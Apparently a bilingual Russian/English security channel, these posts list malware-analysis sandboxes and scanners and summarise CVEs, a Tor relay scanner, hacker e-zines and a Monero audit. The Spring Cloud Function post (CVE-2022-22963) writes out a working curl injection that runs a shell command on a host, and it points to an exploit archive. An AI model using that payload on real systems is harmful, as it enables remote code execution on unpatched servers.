Список сайтов и инструментов(буду пополнять, пока минимум, чтобы глаза не разбегались) для анализа файлов, ссылок и их идентификации
Самый популярный virustotal:🦠VT bot : @VirusTotalAV_bot
🦠VT multisandbox
🦠DrWeb
🦠DrWeb bot: @DrWebBot
🦠metadefender
🦠ESET scanner
🦠totalhash
🦠virusshare
🦠virusbay
🦠cuckoo
🦠website security check & malware scanner
🦠hybrid analysis
🦠Online Website Malware Scanner
🦠ISITPrhishing
🦠Comodo Malware Analysis Sandbox
🦠ANY.RUN(комьюнити версия - бесплатно)❤️
The list of sites and tools (I will replenish, at least for now, so that my eyes do not run away) for analyzing files, links and their identification
The most popular virustotal:🦠VT bot : @VirusTotalAV_bot
🦠VT multisandbox
🦠DrWeb
🦠DrWeb bot: @DrWebBot
🦠metadefender
🦠ESET scanner
🦠totalhash
🦠virusshare
🦠virusbay
🦠cuckoo(automated malware analysis)
🦠website security check & malware scanner
🦠hybrid analysis
🦠Online Website Malware Scanner
🦠ISITPrhishing
🦠Comodo Malware Analysis Sandbox
🦠ANY.RUN(Community version free)❤️
#malware
👍3
|CVE-2022-22963|
spring4shellFAQ
Spring4Shell scan
PoCApp
curl -i -s -k -X $’POST’ -H $’Host: 192.168.1.2:8080 ′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\”touch /tmp/test”)’ –data-binary $’exploit_poc’ $’ http://192.168.1.2:8080/functionRouter ’
#cve #exploit
🔥Spring4Shell.rce 0-day exploit found-in spring cloud
💥CVSS:9.0
spring4shellFAQ
Spring4Shell scan
PoCApp
A critical security vulnerability has bloomed in the Spring Cloud Function, which could lead to remote code execution (RCE) and the compromise of an entire internet-connected host.
Пока что от Spring нет готового патча, в качестве временной меры советуют понизить версию jdk.
Прикладываю архив от vx-underground ниже.
Ссылка на патч, который на данный момент разрабатывается.
So far, there is no ready-made patch from Spring, as a temporary measure, it is advised to downgrade the jdk version.
I attach the archive from vx-underground below.
Link to the patch , which is currently being developed.
The exploit is easy to execute using the curl command:CVE-2022-22963-main.zip
2.3 KB
vx-underground
пароль: infected
password: infectedpoc.py
1.7 KB
PoC Payload:
|exitmap|
В продолжение поста. Это сканер, написанный на питоне, с помощью которого можно получить больше информации о exit relays(torproject), в основном про их надёжность.
In continuation of the post. This is a scanner written in python, with which you can get more information about exit relays(torproject), mainly about their reliability.
#tor #anonymity|e-zines collection(wayback machine)|
Нашёл большой список электронных зинов(e-zines) хакерской тематики, есть как старые так, и относительно новые.
I found a large list of electronic zines (e-zines) of hacker topics, there are both old and relatively new ones.
#hacking #ezine👍1
|Monero Bulletproofs+ Security Audit|
Продолжу
#xmr #cryptocurrency
Продолжу
тему криптовалют.
Опять про монеро, только теперь про аудит безопасности системы проверки monero bulletproofs+, также можете почитать про monero bulletproofs.I will continue the topic of cryptocurrencies.
Again about Monroe, only now about the security audit of the monero bulletproofs+ verification system , you can also read about monero bulletproofs.#xmr #cryptocurrency
|CVE-2022-28128|
AttacheCase(github)
#cve
Untrusted search path vulnerability in AttacheCaseAttacheCase(github)
🦠В AttacheCase(программа для шифрования файлов) версии 3.6.1.0 и более ранних можно загружать DLL небезопасно(к примеру троян DLL), посредством ненадёжного поиска пути и получить привилегии для выполнения вредоносного кода.
Уязвимость была залатана и благодаря устранению этой, предыдущая(AttacheCase3) тоже пофикшена. Для её устранения нужно просто обновиться до последней версии.🦠In AttacheCase(file encryption software) version 3.6.1.0 and earlier, it is possible to load the DLL insecurely (for example, a Trojan DLL), through an unreliable search path and get privileges to execute malicious code.
The vulnerability was patched up and thanks to the elimination of this, the previous one (AttacheCase3) is also fixed. To fix it, you just need to upgrade to the latest version.#cve